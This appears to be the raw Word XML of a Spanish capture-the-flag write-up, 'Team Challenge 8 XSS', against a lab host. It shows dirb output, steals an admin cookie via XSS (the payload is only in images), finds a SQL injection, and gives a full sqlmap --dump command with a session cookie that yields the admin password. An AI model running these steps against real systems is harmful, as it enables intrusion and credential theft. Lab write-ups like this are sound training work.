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20584" w14:textId="62F39712" w:rsidR="00AB4F3D" w:rsidRPr="00AB4F3D" w:rsidRDefault="00AB4F3D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F77D8F" wp14:editId="72989FA0">
            <wp:extent cx="5220429" cy="5210902"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="93872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26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C497" w14:textId="77777777" w:rsidR="00AB4F3D" w:rsidRPr="00AB4F3D" w:rsidRDefault="00AB4F3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC3AC02" w14:textId="77777777" w:rsidR="00AB4F3D" w:rsidRPr="00AB4F3D" w:rsidRDefault="00AB4F3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A635FF9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39E08486" w14:textId="6D7566C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TEAM CHALLENGE 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DDFA6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499515A2" w14:textId="3B55E9CF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XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F499C0D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693BBD9C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1A29F2A7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2690BC5A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3CCBCE2A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2EA0741E" w14:textId="77777777" w:rsidR="00AB4F3D" w:rsidRPr="00AB4F3D" w:rsidRDefault="00AB4F3D" w:rsidP="00AB4F3D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3CDD57" w14:textId="16B6222F" w:rsidR="00AB4F3D" w:rsidRPr="00D14481" w:rsidRDefault="00AB4F3D" w:rsidP="00AB4F3D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14481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.- Se comprueba con nmap toda la información posible del objetico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDA054" w14:textId="48A5029C" w:rsidR="00DD619C" w:rsidRDefault="001C6B6B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D351B" wp14:editId="0D0EAF87">
            <wp:extent cx="5399220" cy="3785190"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="140490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9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476" cy="37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1A5B" w14:textId="0B16A567" w:rsidR="00AB4F3D" w:rsidRPr="00D14481" w:rsidRDefault="00AB4F3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D14481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.- Se consulta con Gobuster y dirb las carpetas accesibles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA587F" w14:textId="3BBABF55" w:rsidR="00212F0A" w:rsidRPr="00AB4F3D" w:rsidRDefault="00385DCA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AE1D2" wp14:editId="323934A6">
            <wp:extent cx="5422265" cy="3934047"/>
            <wp:effectExtent l="0" t="0" r="6985" b="9525"/>
            <wp:docPr id="22755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832" cy="39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E98" w14:textId="427206B8" w:rsidR="0085072B" w:rsidRDefault="00F77E62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789A03" wp14:editId="4CB91E69">
            <wp:extent cx="4496427" cy="5801535"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="126451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6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B085" w14:textId="77777777" w:rsidR="001F3633" w:rsidRPr="001F3633" w:rsidRDefault="001F3633" w:rsidP="001F3633">
      <w:pPr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F3633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DIRB v2.22    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427A3ED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By The Dark Raver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC88B20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-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DFDCC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</w:p>
    <w:p w14:paraId="414E7DA2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START_TIME: Wed Jul 24 04:29:05 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3699DF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URL_BASE: http://10.0.2.20/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BA0109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WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C6AE62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</w:p>
    <w:p w14:paraId="6B1C9FAB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-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44265A8F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</w:p>
    <w:p w14:paraId="0E6CE81C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">GENERATED WORDS: 4612                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03112A94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</w:p>
    <w:p w14:paraId="449B3047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Scanning URL: http://10.0.2.20/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097FCB3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==&gt; DIRECTORY: http://10.0.2.20/admin/                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C60E88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http://10.0.2.20/all (CODE:200|SIZE:644)                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16285764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http://10.0.2.20/cgi-bin/ (CODE:403|SIZE:285)                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD64F5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==&gt; DIRECTORY: http://10.0.2.20/classes/                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06C560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==&gt; DIRECTORY: http://10.0.2.20/css/                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCEBA75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http://10.0.2.20/favicon.ico (CODE:200|SIZE:14634)                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED3F864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http://10.0.2.20/footer (CODE:200|SIZE:185)                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ECDEA8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http://10.0.2.20/header (CODE:200|SIZE:571)                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E26B410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==&gt; DIRECTORY: http://10.0.2.20/images/                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD6AC44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http://10.0.2.20/index (CODE:200|SIZE:1311)                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9BA09F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http://10.0.2.20/index.php (CODE:200|SIZE:1311)                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DA729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http://10.0.2.20/post (CODE:200|SIZE:786)                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2C0F6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http://10.0.2.20/server-status (CODE:403|SIZE:290)                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A17AE2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</w:p>
    <w:p w14:paraId="12F3D798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Entering directory: http://10.0.2.20/admin/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA28B22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http://10.0.2.20/admin/del (CODE:302|SIZE:0)                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C05193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http://10.0.2.20/admin/edit (CODE:302|SIZE:0)                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32062D0D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http://10.0.2.20/admin/footer (CODE:200|SIZE:19)                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FB0B7D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http://10.0.2.20/admin/header (CODE:200|SIZE:653)                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F483FE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http://10.0.2.20/admin/index (CODE:302|SIZE:0)                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7868FC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http://10.0.2.20/admin/index.php (CODE:302|SIZE:0)                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6070DA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http://10.0.2.20/admin/login (CODE:200|SIZE:1387)                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D624D9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http://10.0.2.20/admin/logout (CODE:302|SIZE:0)                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5087E0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+ http://10.0.2.20/admin/new (CODE:302|SIZE:0)                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F797DB6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==&gt; DIRECTORY: http://10.0.2.20/admin/uploads/                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D860B8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</w:p>
    <w:p w14:paraId="02035621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Entering directory: http://10.0.2.20/classes/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550BD6F3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42421381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(Use mode '-w' if you want to scan it anyway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF30391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</w:p>
    <w:p w14:paraId="34DCCB5C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Entering directory: http://10.0.2.20/css/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157261AA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(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6019770B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(Use mode '-w' if you want to scan it anyway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8DB5B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</w:p>
    <w:p w14:paraId="2503FD4A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Entering directory: http://10.0.2.20/images/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2518C172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(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C209C8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(Use mode '-w' if you want to scan it anyway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE0F8D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</w:p>
    <w:p w14:paraId="6CA78284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>---- Entering directory: http://10.0.2.20/admin/uploads/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146EA2D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(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4892B3A9" w14:textId="77777777" w:rsidR="001F3633" w:rsidRPr="00AB4F3D" w:rsidRDefault="001F3633" w:rsidP="001F3633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(Use mode '-w' if you want to scan it anyway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F034937" w14:textId="77777777" w:rsidR="001F3633" w:rsidRPr="00AB4F3D" w:rsidRDefault="001F3633" w:rsidP="001F3633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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F64445E" w14:textId="7211E00B" w:rsidR="001F3633" w:rsidRPr="001F3633" w:rsidRDefault="001F3633" w:rsidP="001F3633">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.- Comprobamos si es vulnerable a XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A964A" w14:textId="74746341" w:rsidR="001F3633" w:rsidRPr="00AB4F3D" w:rsidRDefault="001F3633" w:rsidP="001F3633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10B4AB" wp14:editId="2762A5CB">
            <wp:extent cx="5400040" cy="3100705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="9038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243A" w14:textId="77777777" w:rsidR="001F3633" w:rsidRDefault="001F3633">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A99B08E" w14:textId="77777777" w:rsidR="001F3633" w:rsidRDefault="001F3633">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CFBD33" w14:textId="77777777" w:rsidR="001F3633" w:rsidRDefault="001F3633">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD11480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506BE52C" w14:textId="77777777" w:rsidR="00C44B5B" w:rsidRPr="00AB4F3D" w:rsidRDefault="00C44B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596BD32E" w14:textId="177F8727" w:rsidR="004F4306" w:rsidRPr="001F3633" w:rsidRDefault="001F3633">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F77E62" w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.- </w:t>
      </w:r>
      <w:r w:rsidR="00D14481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Se e</w:t>
      </w:r>
      <w:r w:rsidR="004F4306" w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>jecut</w:t>
      </w:r>
      <w:r w:rsidR="00D14481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">a un </w:t>
      </w:r>
      <w:r w:rsidR="00D14481" w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="004F4306" w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> para </w:t>
      </w:r>
      <w:r w:rsidR="00D14481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>extraer la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4F4306" w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">istrador </w:t>
      </w:r>
      <w:r w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="004F4306" w:rsidRPr="001F3633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> entrar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>en el blog</w:t>
      </w:r>
      <w:r w:rsidR="00D14481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> con este usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F0527" w14:textId="77777777" w:rsidR="00D711C9" w:rsidRPr="00AB4F3D" w:rsidRDefault="00D711C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435BBBA0" w14:textId="229436C3" w:rsidR="004F4306" w:rsidRDefault="004F4306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05A990" wp14:editId="511FA2B2">
            <wp:extent cx="5400040" cy="3310890"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1555765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5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DAF" w14:textId="3ACEDED7" w:rsidR="00C44B5B" w:rsidRPr="00AB4F3D" w:rsidRDefault="00C44B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lo recibo en mi Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A15A90" w14:textId="6DA532D6" w:rsidR="004F4306" w:rsidRDefault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9C1CEC" wp14:editId="3E2E819A">
            <wp:extent cx="5400040" cy="2147777"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="126566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7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530" cy="21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FEB" w14:textId="7BA924F0" w:rsidR="00D14481" w:rsidRDefault="001D5916">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D59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B04B9" wp14:editId="3C82D5AE">
            <wp:extent cx="5762625" cy="1477925"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="110045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2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3450" cy="14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0DC0" w14:textId="34137705" w:rsidR="00D14481" w:rsidRPr="00AB4F3D" w:rsidRDefault="00D14481" w:rsidP="00D144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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D14481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.- Una vez autenticados como administrador, accedemos al apartado edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. donde, al ponerle una comilla al final de la URL, produce un error en la función</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql_fetch_assoc ()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, la cual, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>espera un recurso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que al ser false, produce el error, por lo que se deduce que </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no está manejando adecuadamente la entrada del usuario y es probable que sea vulnerable a inyección SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B9409" w14:textId="5CA52FFA" w:rsidR="00D14481" w:rsidRPr="00AB4F3D" w:rsidRDefault="00D14481">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26CBACA3" w14:textId="757E6EBB" w:rsidR="0095733E" w:rsidRDefault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6AE68F" wp14:editId="3D515111">
            <wp:extent cx="5400040" cy="4253023"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="178249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267" cy="42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E90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530ACDAC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4152DA1B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0F84F31D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1EB60A66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159606FA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1D7B70A5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61FC2FD0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31A8B7CC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00ED4FA5" w14:textId="77777777" w:rsidR="00C44B5B" w:rsidRDefault="00C44B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E8BCB1" w14:textId="4F04E7C3" w:rsidR="00C44B5B" w:rsidRDefault="00C44B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C44B5B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.- utilizamos sqlmap para extraer la máxima información:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F3690" w14:textId="6A9226D2" w:rsidR="001A7B60" w:rsidRPr="001A7B60" w:rsidRDefault="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a) info general</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, extrayendo </w:t>
      </w:r>
      <w:r w:rsidR="0003474C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">la bases de datos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A4B95" w14:textId="70DD6D8C" w:rsidR="001A7B60" w:rsidRPr="00C44B5B" w:rsidRDefault="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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C09808" wp14:editId="2BEAFDC0">
            <wp:extent cx="4867628" cy="8102010"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2116398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8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896" cy="81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4E9E" w14:textId="6CDC4322" w:rsidR="00C44B5B" w:rsidRPr="0003474C" w:rsidRDefault="001A7B60" w:rsidP="00C44B5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03474C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b</w:t>
      </w:r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) sqlmap -u "http://10.0.2.21/admin/edit.php?id=</w:t>
      </w:r>
      <w:r w:rsidRPr="0003474C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C44B5B" w:rsidRPr="0003474C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" --cookie="PHPSESSID=s95hmsjfevcfa8njed8603q3c4" --dump –batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A7F7F" w14:textId="5EE9AFFC" w:rsidR="00C44B5B" w:rsidRPr="00C44B5B" w:rsidRDefault="00C44B5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US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114152" wp14:editId="0E7AC9C4">
            <wp:extent cx="5816009" cy="7310755"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="102458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844" cy="73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DE2" w14:textId="3C020DC4" w:rsidR="00C44B5B" w:rsidRPr="001A7B60" w:rsidRDefault="001A7B60">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Extr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ae</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7B60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mos usuario admin y c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ontraseña P4ssw0rd, por lo que ya tengo acceso de forme persistente.</w:t>
      </w:r>
    </w:p>
